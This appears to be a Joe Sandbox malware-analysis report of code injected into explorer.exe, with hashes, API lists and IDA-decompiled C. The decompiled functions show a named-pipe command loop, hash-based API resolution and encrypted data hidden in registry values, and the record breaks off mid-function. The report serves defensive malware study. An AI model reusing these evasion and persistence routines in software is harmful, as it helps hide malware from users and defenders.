                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 2e02a3581bfa86ee0236564b08f4adab1e49b8db52c5e66971988f717cc598b6
                                          • Instruction ID: 48420b51e388212ba148de9a5a5aa9c152fd141e90dbe33b6e7652c92ab7c875
                                          • Opcode Fuzzy Hash: 2e02a3581bfa86ee0236564b08f4adab1e49b8db52c5e66971988f717cc598b6
                                          • Instruction Fuzzy Hash: 139127B1900209AFDF10EFA9DD45DEEBBB8FF48310F144169F555AB262DB359A00CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 428 832a1-832b4 429 832b7-832ce ConnectNamedPipe 428->429 430 832d0-832db GetLastError 429->430 431 832e1-83304 429->431 430->431 432 834c2-834c8 430->432 434 834a8 GetLastError 431->434 435 8330a-8330e 431->435 436 834ae-834bc DisconnectNamedPipe 434->436 435->434 437 83314-83320 435->437 436->429 436->432 438 833b8-833d1 call 893be 437->438 439 83326-83329 437->439 448 83476-8349b call 896ca 438->448 449 833d7-833dd 438->449 441 8332b-8332f 439->441 442 83397-833b3 call 8c319 439->442 445 8337b-83384 call 8f79f 441->445 446 83331-83334 441->446 442->436 465 83358-8335b 445->465 451 83365-83369 call 8f79f 446->451 452 83336-83339 446->452 468 8349d-834a6 call 8c319 448->468 454 833df-833f6 call 88604 449->454 455 83454-8346f call 89749 call 81da0 449->455 463 8336e-83376 451->463 458 8333b-8333e 452->458 459 8334f-83353 call 8f7c1 452->459 476 833f8-833fd 454->476 477 83471 454->477 455->448 458->436 466 83344-8334d call 8f7c1 458->466 459->465 463->468 469 8335d-83363 465->469 470 83386-83388 465->470 466->463 468->436 475 8338a-83392 call 8c319 469->475 470->475 475->436 480 8342a-83452 call 89749 call 81da0 call 894b7 476->480 481 833ff-83402 476->481 484 83473 477->484 480->484 486 83404-83425 call 8c379 call 891a6 481->486 484->448 496 83427 486->496 496->480
                                          C-Code - Quality: 54%
                                          			E000832A1() {
                                          				char _v8;
                                          				struct _OVERLAPPED* _v12;
                                          				struct _OVERLAPPED* _v16;
                                          				intOrPtr* _v20;
                                          				char _v24;
                                          				intOrPtr _v32;
                                          				signed int _v36;
                                          				intOrPtr* _v40;
                                          				char _v168;
                                          				char _v172;
                                          				intOrPtr _t41;
                                          				void* _t47;
                                          				char _t54;
                                          				char _t61;
                                          				intOrPtr _t64;
                                          				void* _t65;
                                          				void* _t68;
                                          				void* _t70;
                                          				void* _t72;
                                          				void* _t76;
                                          				struct _OVERLAPPED* _t82;
                                          				intOrPtr* _t83;
                                          				signed int _t84;
                                          				signed short* _t86;
                                          				intOrPtr* _t97;
                                          				signed short* _t105;
                                          				void* _t107;
                                          				void* _t108;
                                          				void* _t109;
                                          				intOrPtr* _t112;
                                          				struct _OVERLAPPED* _t113;
                                          				char _t114;
                                          				void* _t115;
                                          
                                          				_t113 = 0;
                                          				_t82 = 0;
                                          				_v8 = 0;
                                          				_v12 = 0;
                                          				while(1) {
                                          					_v16 = _t113;
                                          					if(ConnectNamedPipe( *0x9e674, _t113) == 0 && GetLastError() != 0x217) {
                                          						break;
                                          					}
                                          					_push(_t113);
                                          					_push( &_v16);
                                          					_t41 =  *0x9e684; // 0x34f8f0
                                          					_push(0x80000);
                                          					_push( *0x9e724);
                                          					_push( *0x9e674);
                                          					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
                                          						GetLastError();
                                          					} else {
                                          						_t86 =  *0x9e724; // 0x2610020
                                          						_t47 = ( *_t86 & 0x0000ffff) - 1;
                                          						if(_t47 == 0) {
                                          							_t112 = E000893BE( &(_t86[4]), 0x20, 1,  &_v24);
                                          							_v40 = _t112;
                                          							if(_t112 != 0) {
                                          								_t114 = _v24;
                                          								if(_t114 <= 1) {
                                          									_t113 = 0;
                                          									_t54 = E00081DA0(E00089749( *_t112), 0, 0, 0);
                                          									_t115 = _t115 + 0x10;
                                          									_v172 = _t54;
                                          								} else {
                                          									_v36 = _t114 - 1;
                                          									_t83 = E00088604(_t114 - 1 << 2);
                                          									_v32 = _t83;
                                          									if(_t83 == 0) {
                                          										_t113 = 0;
                                          									} else {
                                          										if(_t114 > 1) {
                                          											_v20 = _t83;
                                          											_t84 = 1;
                                          											do {
                                          												_t64 = E000891A6( *((intOrPtr*)(_t112 + _t84 * 4)), E0008C379( *((intOrPtr*)(_t112 + _t84 * 4))));
                                          												_t97 = _v20;
                                          												_t84 = _t84 + 1;
                                          												 *_t97 = _t64;
                                          												_v20 = _t97 + 4;
                                          											} while (_t84 < _t114);
                                          											_t83 = _v32;
                                          										}
                                          										_t113 = 0;
                                          										_t61 = E00081DA0(E00089749( *_t112), _t83, _v36, 0);
                                          										_t115 = _t115 + 0x10;
                                          										_v172 = _t61;
                                          										E000894B7( &_v24);
                                          									}
                                          									_t82 = _v12;
                                          								}
                                          							}
                                          							_t105 =  *0x9e724; // 0x2610020
                                          							E000896CA( &_v168,  &(_t105[4]), 0x80);
                                          							_push(0x84);
                                          							_push( &_v172);
                                          							_push(2);
                                          							goto L33;
                                          						} else {
                                          							_t65 = _t47 - 3;
                                          							if(_t65 == 0) {
                                          								_push(_t113);
                                          								_push(_t113);
                                          								_t108 = 5;
                                          								E0008C319(_t108);
                                          								 *0x9e758 = 1;
                                          								_t82 = 1;
                                          								_v12 = 1;
                                          							} else {
                                          								_t68 = _t65;
                                          								if(_t68 == 0) {
                                          									_t70 = E0008F79F( &_v8);
                                          									goto L13;
                                          								} else {
                                          									_t72 = _t68 - 1;
                                          									if(_t72 == 0) {
                                          										E0008F79F( &_v8);
                                          										goto L16;
                                          									} else {
                                          										_t76 = _t72 - 1;
                                          										if(_t76 == 0) {
                                          											_t70 = E0008F7C1( &_v8);
                                          											L13:
                                          											if(_t70 == 0) {
                                          												_push(_t113);
                                          												_push(_t113);
                                          												_push(0xa);
                                          											} else {
                                          												_push(_v8);
                                          												_push(_t70);
                                          												_push(5);
                                          											}
                                          											_pop(_t109);
                                          											E0008C319(_t109);
                                          										} else {
                                          											if(_t76 == 1) {
                                          												E0008F7C1( &_v8);
                                          												L16:
                                          												_push(4);
                                          												_push( &_v8);
                                          												_push(5);
                                          												L33:
                                          												_pop(_t107);
                                          												E0008C319(_t107);
                                          												_t115 = _t115 + 0xc;
                                          											}
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          					DisconnectNamedPipe( *0x9e674);
                                          					if(_t82 == 0) {
                                          						continue;
                                          					}
                                          					break;
                                          				}
                                          				return 0;
                                          			}
                                          0x0008335b
                                          0x00083386
                                          0x00083387
                                          0x00083388
                                          0x0008335d
                                          0x0008335d
                                          0x00083360
                                          0x00083361
                                          0x00083361
                                          0x0008338a
                                          0x0008338b
                                          0x0008333b
                                          0x0008333e
                                          0x00083348
                                          0x0008336e
                                          0x0008336e
                                          0x00083373
                                          0x00083374
                                          0x0008349d
                                          0x0008349d
                                          0x0008349e
                                          0x000834a3
                                          0x000834a3
                                          0x0008333e
                                          0x00083339
                                          0x00083334
                                          0x0008332f
                                          0x00083329
                                          0x00083320
                                          0x000834b4
                                          0x000834bc
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x000834bc
                                          0x000834c8

                                          APIs
                                          • ConnectNamedPipe.KERNELBASE(00000000), ref: 000832C6
                                          • GetLastError.KERNEL32 ref: 000832D0
                                            • Part of subcall function 0008C319: FlushFileBuffers.KERNEL32(000001E4), ref: 0008C35F
                                          • DisconnectNamedPipe.KERNEL32 ref: 000834B4
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
                                          • String ID:
                                          • API String ID: 2389948835-0
                                          • Opcode ID: be6ae701c2cd6f96a3c21335c1a9f6642868689993e908009eddb05f95c01e46
                                          • Instruction ID: aec34d1c461da35ce7ea10a51bd790cfc71f6dd0dd97058cb51a1121444265f8
                                          • Opcode Fuzzy Hash: be6ae701c2cd6f96a3c21335c1a9f6642868689993e908009eddb05f95c01e46
                                          • Instruction Fuzzy Hash: 4151E472A00215ABEB61FFA4DC89AEEBBB8FF45750F104026F584A6151DB749B44CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 498 8b012-8b079 memset * 2 SHGetFolderPathW call 8b946 501 8b07c-8b07e 498->501 502 8b0ab-8b0dd call 8c392 lstrcpynW 501->502 503 8b080-8b094 call 8bb8d 501->503 503->502 507 8b096-8b0a7 503->507 507->502
                                          C-Code - Quality: 87%
                                          			E0008B012(void* __ecx, WCHAR* __edx) {
                                          				int _v8;
                                          				void _v528;
                                          				char _v1046;
                                          				void _v1048;
                                          				intOrPtr _t21;
                                          				intOrPtr* _t26;
                                          				void* _t27;
                                          				intOrPtr _t33;
                                          				intOrPtr _t36;
                                          				void* _t39;
                                          				intOrPtr _t40;
                                          				WCHAR* _t47;
                                          				void* _t49;
                                          
                                          				_t39 = __ecx;
                                          				_v8 = 0x104;
                                          				_t47 = __edx;
                                          				memset( &_v1048, 0, 0x208);
                                          				memset( &_v528, 0, 0x208);
                                          				_t21 =  *0x9e698; // 0x34fbc8
                                          				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
                                          				_t49 = E0008B946(_t39);
                                          				_t26 =  *0x9e6b8; // 0x34fbd8
                                          				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
                                          				if(_t27 == 0) {
                                          					_t33 =  *0x9e688; // 0xb0000
                                          					if(E0008BB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
                                          						_t36 =  *0x9e698; // 0x34fbc8
                                          						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
                                          					}
                                          				}
                                          				_t40 =  *0x9e684; // 0x34f8f0
                                          				 *((intOrPtr*)(_t40 + 0x30))(_t49);
                                          				lstrcpynW(_t47,  &_v1046 + E0008C392( &_v528) * 2, 0x104);
                                          				return 1;
                                          			}

                                          APIs
                                          • memset.MSVCRT ref: 0008B037
                                          • memset.MSVCRT ref: 0008B045
                                          • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 0008B05F
                                            • Part of subcall function 0008B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B959
                                            • Part of subcall function 0008B946: GetLastError.KERNEL32(?,?,0008BA7C,74EC17D9,10000000), ref: 0008B967
                                            • Part of subcall function 0008B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B980
                                          • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 0008B0D0
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
                                          • String ID:
                                          • API String ID: 3158470084-0
                                          • Opcode ID: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
                                          • Instruction ID: 19c7f563789c793ddff4382733eb78b8a69f152fd9c3ce08f6bae5569c2b2d08
                                          • Opcode Fuzzy Hash: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
                                          • Instruction Fuzzy Hash: FA218EB2501218BFE710EBA4DCC9EDB77BCBB49354F1040A5F20AD7192EB749E458B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 510 8bf37-8bf66 RegOpenKeyExW 511 8bf68-8bf6a 510->511 512 8bf6c-8bf8a RegQueryValueExW 510->512 513 8bfda-8bfdc 511->513 514 8bf8c-8bf9c call 88604 512->514 515 8bfc7-8bfca 512->515 514->515 521 8bf9e-8bfb8 RegQueryValueExW 514->521 516 8bfcc-8bfd1 515->516 517 8bfd7 515->517 516->517 519 8bfd9 517->519 519->513 522 8bfba-8bfc6 call 8861a 521->522 523 8bfdd-8bfea RegCloseKey 521->523 522->515 523->519
                                          C-Code - Quality: 100%
                                          			E0008BF37(short* __edx, short* _a4) {
                                          				void* _v8;
                                          				int _v12;
                                          				int _v16;
                                          				char* _v20;
                                          				char* _t30;
                                          				intOrPtr _t31;
                                          				char* _t49;
                                          
                                          				_v16 = 0;
                                          				_v12 = 0;
                                          				_v8 = 0;
                                          				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
                                          					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
                                          						L6:
                                          						if(_v8 != 0) {
                                          							_t31 =  *0x9e68c; // 0x34fab8
                                          							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
                                          						}
                                          						_t30 = 0;
                                          						L9:
                                          						return _t30;
                                          					}
                                          					_t49 = E00088604(_v12);
                                          					_v20 = _t49;
                                          					if(_t49 == 0) {
                                          						goto L6;
                                          					}
                                          					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
                                          						RegCloseKey(_v8);
                                          						_t30 = _t49;
                                          						goto L9;
                                          					}
                                          					E0008861A( &_v20, 0xfffffffe);
                                          					goto L6;
                                          				}
                                          				return 0;
                                          			}

                                          APIs
                                          • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,00082C08,00000000), ref: 0008BF5E
                                          • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,?,00000000,00082C08,00000000,?,?,00082C08,00000000), ref: 0008BF82
                                          • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,00000000,00000000,00082C08,?,?,00082C08,00000000), ref: 0008BFB0
                                          • RegCloseKey.KERNEL32(00000000,?,?,00082C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 0008BFE5
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: QueryValue$CloseOpen
                                          • String ID:
                                          • API String ID: 1586453840-0
                                          • Opcode ID: 8ffa3b54626bbe71b199a840e3cf3d821d05c175afa1efb499af0953314715c4
                                          • Instruction ID: 30ccd786ff8b7b84f14da17d4d39020c4d4bce544ae74224a6a2efcb0f455484
                                          • Opcode Fuzzy Hash: 8ffa3b54626bbe71b199a840e3cf3d821d05c175afa1efb499af0953314715c4
                                          • Instruction Fuzzy Hash: 3121E8B6900118FFDB50EBA9DC48E9EBBF8FF88750B1541AAF645E6162D7309A00DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 526 8be9b-8bec3 RegOpenKeyExA 527 8bec9-8bee6 RegQueryValueExA 526->527 528 8bec5-8bec7 526->528 530 8bee8-8bef7 call 88604 527->530 531 8bf21-8bf24 527->531 529 8bf33-8bf36 528->529 530->531 536 8bef9-8bf13 RegQueryValueExA 530->536 533 8bf31 531->533 534 8bf26-8bf2e RegCloseKey 531->534 533->529 534->533 536->531 537 8bf15-8bf1a 536->537 537->531 538 8bf1c-8bf1f 537->538 538->531
                                          C-Code - Quality: 100%
                                          			E0008BE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
                                          				void* _v8;
                                          				int _v12;
                                          				int _v16;
                                          				char* _t34;
                                          				intOrPtr* _t43;
                                          				char* _t46;
                                          
                                          				_t46 = 0;
                                          				_v8 = 0;
                                          				_v16 = 0;
                                          				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
                                          					return 0;
                                          				}
                                          				_v12 = 0;
                                          				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
                                          					_t34 = E00088604(_v12 + 1); // executed
                                          					_t46 = _t34;
                                          					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
                                          						_t43 = _a12;
                                          						if(_t43 != 0) {
                                          							 *_t43 = _v12;
                                          						}
                                          					}
                                          				}
                                          				if(_v8 != 0) {
                                          					RegCloseKey(_v8);
                                          				}
                                          				return _t46;
                                          			}

                                          APIs
                                          • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,0034FC18,00000000,?,00000002), ref: 0008BEBE
                                          • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BEE1
                                          • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BF0E
                                          • RegCloseKey.KERNEL32(?,?,00000002), ref: 0008BF2E
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: QueryValue$CloseOpen
                                          • String ID:
                                          • API String ID: 1586453840-0
                                          • Opcode ID: ddc077ba024ef068cbd919a8e6084d299da2af67421786a4409f78ee1ec57403
                                          • Instruction ID: a503bc69bf056dc60d578d60e72969ac8cbe77b2aa393cc8f9a4dd6054926014
                                          • Opcode Fuzzy Hash: ddc077ba024ef068cbd919a8e6084d299da2af67421786a4409f78ee1ec57403
                                          • Instruction Fuzzy Hash: 0921A4B5A00148BF9B61DFA9DC44DAEBBF8FF98740B1141A9B945E7211D7309E00DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 539 8dfad-8dfc4 540 8e021 539->540 541 8dfc6-8dfee 539->541 543 8e023-8e027 540->543 541->540 542 8dff0-8e013 call 8c379 call 8d400 541->542 548 8e028-8e03f 542->548 549 8e015-8e01f 542->549 550 8e041-8e049 548->550 551 8e095-8e097 548->551 549->540 549->542 550->551 552 8e04b 550->552 551->543 553 8e04d-8e053 552->553 554 8e063-8e074 553->554 555 8e055-8e057 553->555 557 8e079-8e085 LoadLibraryA 554->557 558 8e076-8e077 554->558 555->554 556 8e059-8e061 555->556 556->553 556->554 557->540 559 8e087-8e091 GetProcAddress 557->559 558->557 559->540 560 8e093 559->560 560->543
                                          C-Code - Quality: 100%
                                          			E0008DFAD(void* __ecx, intOrPtr __edx) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				char _v92;
                                          				intOrPtr _t41;
                                          				signed int _t47;
                                          				signed int _t49;
                                          				signed int _t51;
                                          				void* _t56;
                                          				struct HINSTANCE__* _t58;
                                          				_Unknown_base(*)()* _t59;
                                          				intOrPtr _t60;
                                          				void* _t62;
                                          				intOrPtr _t63;
                                          				void* _t69;
                                          				char _t70;
                                          				void* _t75;
                                          				CHAR* _t80;
                                          				void* _t82;
                                          
                                          				_t75 = __ecx;
                                          				_v12 = __edx;
                                          				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                          				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                          				if(_t41 == 0) {
                                          					L4:
                                          					return 0;
                                          				}
                                          				_t62 = _t41 + __ecx;
                                          				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                          				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                          				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                          				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                          				_t47 = 0;
                                          				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                          				_v8 = 0;
                                          				_v16 = _t63;
                                          				if(_t63 == 0) {
                                          					goto L4;
                                          				} else {
                                          					goto L2;
                                          				}
                                          				while(1) {
                                          					L2:
                                          					_t49 = E0008D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0008C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                          					_t51 = _v8;
                                          					if((_t49 ^ 0x218fe95b) == _v12) {
                                          						break;
                                          					}
                                          					_t73 = _v20;
                                          					_t47 = _t51 + 1;
                                          					_v8 = _t47;
                                          					if(_t47 < _v16) {
                                          						continue;
                                          					}
                                          					goto L4;
                                          				}
                                          				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                          				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                          				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                          					return _t80;
                                          				} else {
                                          					_t56 = 0;
                                          					while(1) {
                                          						_t70 = _t80[_t56];
                                          						if(_t70 == 0x2e || _t70 == 0) {
                                          							break;
                                          						}
                                          						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                          						_t56 = _t56 + 1;
                                          						if(_t56 < 0x40) {
                                          							continue;
                                          						}
                                          						break;
                                          					}
                                          					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                          					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                          					if( *((char*)(_t56 + _t80)) != 0) {
                                          						_t80 =  &(( &(_t80[1]))[_t56]);
                                          					}
                                          					_t40 =  &_v92; // 0x6c6c642e
                                          					_t58 = LoadLibraryA(_t40); // executed
                                          					if(_t58 == 0) {
                                          						goto L4;
                                          					}
                                          					_t59 = GetProcAddress(_t58, _t80);
                                          					if(_t59 == 0) {
                                          						goto L4;
                                          					}
                                          					return _t59;
                                          				}
                                          			}

                                          APIs
                                          • LoadLibraryA.KERNEL32(.dll), ref: 0008E07D
                                          • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0008E089
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: .dll
                                          • API String ID: 2574300362-2738580789
                                          • Opcode ID: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                                          • Instruction ID: 961bbec8ee8d513a9e7f355b8d92f0886381f3dfd6057b13809224bdd72c88db
                                          • Opcode Fuzzy Hash: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                                          • Instruction Fuzzy Hash: 6F310631A001458BCB25EFADC884BAEBBF5BF44304F280869D981D7352DB70EC81CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 561 8a0ab-8a0c2 562 8a0c8-8a0cc 561->562 563 8a231 561->563 562->563 564 8a0d2-8a0d4 562->564 565 8a234-8a238 563->565 564->563 566 8a0da-8a130 call 8d400 call 92301 call 9242d call 88604 564->566 575 8a13a-8a1b9 call 886e1 call 922d3 call 8f490 call 8eac1 call 8eb2e call 89b0e 566->575 576 8a132-8a135 566->576 589 8a1bb-8a1e3 call 897a0 RegOpenKeyExA 575->589 590 8a220-8a22f call 8861a 575->590 576->565 595 8a1ea-8a203 RegSetValueExA 589->595 596 8a1e5-8a1e8 589->596 590->565 598 8a208-8a210 RegCloseKey 595->598 599 8a205-8a207 595->599 597 8a213-8a21f call 8861a 596->597 597->590 598->597 599->598
                                          C-Code - Quality: 82%
                                          			E0008A0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
                                          				char* _v12;
                                          				char _v16;
                                          				int _v20;
                                          				signed int _v24;
                                          				intOrPtr _v28;
                                          				char* _v32;
                                          				char _v52;
                                          				char _v64;
                                          				char _v328;
                                          				char _v2832;
                                          				signed int _t48;
                                          				signed int _t49;
                                          				char* _t54;
                                          				long _t73;
                                          				long _t80;
                                          				long _t83;
                                          				void* _t88;
                                          				char* _t89;
                                          				intOrPtr _t90;
                                          				void* _t103;
                                          				void* _t104;
                                          				char* _t106;
                                          				intOrPtr _t107;
                                          				char _t108;
                                          
                                          				_t48 = __ecx;
                                          				_t89 = __edx;
                                          				_v24 = __ecx;
                                          				if(_a4 == 0 || _a8 == 0) {
                                          					L13:
                                          					_t49 = _t48 | 0xffffffff;
                                          					__eflags = _t49;
                                          					return _t49;
                                          				} else {
                                          					_t115 = __edx;
                                          					if(__edx == 0) {
                                          						goto L13;
                                          					}
                                          					_t107 =  *((intOrPtr*)(__ecx + 0x108));
                                          					_push(_t107);
                                          					_t103 = 4;
                                          					_v12 = __edx;
                                          					_v28 = E0008D400( &_v12, _t103);
                                          					_t93 = _t107 + __edx;
                                          					E00092301(_t107 + __edx,  &_v2832);
                                          					_t54 = E0009242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
                                          					_t108 = _a8;
                                          					_v12 = _t54;
                                          					_v20 = _t54 + 6 + _t108;
                                          					_t106 = E00088604(_t54 + 6 + _t108);
                                          					_v32 = _t106;
                                          					if(_t106 != 0) {
                                          						 *_t106 = _a12;
                                          						_t16 =  &(_t106[6]); // 0x6
                                          						_t106[1] = 1;
                                          						_t106[2] = _t108;
                                          						E000886E1(_t16, _a4, _t108);
                                          						_t21 = _t108 + 6; // 0x6
                                          						E000922D3( &_v2832, _t21 + _t106, _v12);
                                          						_v16 = _t89;
                                          						_t90 = _v24;
                                          						_v12 =  *((intOrPtr*)(_t90 + 0x108));
                                          						_push( &_v52);
                                          						_t104 = 8;
                                          						E0008F490( &_v16, _t104);
                                          						E0008EAC1( &_v16,  &_v52, 0x14,  &_v328);
                                          						E0008EB2E(_t106, _v20,  &_v328);
                                          						_t73 = E00089B0E(_t90);
                                          						_v12 = _t73;
                                          						__eflags = _t73;
                                          						if(_t73 != 0) {
                                          							E000897A0(_v28,  &_v64, 0x10);
                                          							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
                                          							__eflags = _t80;
                                          							if(_t80 == 0) {
                                          								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
                                          								__eflags = _t83;
                                          								if(_t83 != 0) {
                                          									_push(0xfffffffc);
                                          									_pop(0);
                                          								}
                                          								RegCloseKey(_a4);
                                          							} else {
                                          								_push(0xfffffffd);
                                          								_pop(0);
                                          							}
                                          							E0008861A( &_v12, 0xffffffff);
                                          						}
                                          						E0008861A( &_v32, 0);
                                          						return 0;
                                          					}
                                          					_t88 = 0xfffffffe;
                                          					return _t88;
                                          				}
                                          			}

                                          APIs
                                            • Part of subcall function 0009242D: _ftol2_sse.MSVCRT ref: 0009248E
                                            • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                          • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 0008A1DE
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeapOpen_ftol2_sse
                                          • String ID:
                                          • API String ID: 3756893521-0
                                          • Opcode ID: a869f1493576e0564957202c263c6ba23f2199c5f3dac02cda2040495ac44554
                                          • Instruction ID: 678beb8ec0cb8c060cb6281312f41271aa2b36fb26bfbf1ebb42210e6552e48b
                                          • Opcode Fuzzy Hash: a869f1493576e0564957202c263c6ba23f2199c5f3dac02cda2040495ac44554
                                          • Instruction Fuzzy Hash: 7551B372A00209BBDF20EF94DC41FDEBBB8BF05320F108166F555A7291EB749644CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 602 8a911-8a941 memset 603 8a94c-8a971 CreateProcessW 602->603 604 8a943-8a948 602->604 605 8a9ae 603->605 606 8a973-8a976 603->606 604->603 609 8a9b0-8a9b6 605->609 607 8a978-8a988 606->607 608 8a996-8a9ac 606->608 607->608 612 8a98a-8a990 GetExitCodeProcess 607->612 608->609 612->608
                                          C-Code - Quality: 66%
                                          			E0008A911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
                                          				struct _PROCESS_INFORMATION _v20;
                                          				struct _STARTUPINFOW _v92;
                                          				signed int _t24;
                                          				intOrPtr _t30;
                                          				intOrPtr _t32;
                                          				intOrPtr _t34;
                                          				int _t42;
                                          				WCHAR* _t44;
                                          
                                          				_t42 = 0x44;
                                          				memset( &_v92, 0, _t42);
                                          				_v92.cb = _t42;
                                          				asm("stosd");
                                          				_t44 = 1;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t24 = _a16;
                                          				if(_t24 != 0) {
                                          					_v92.dwFlags = 1;
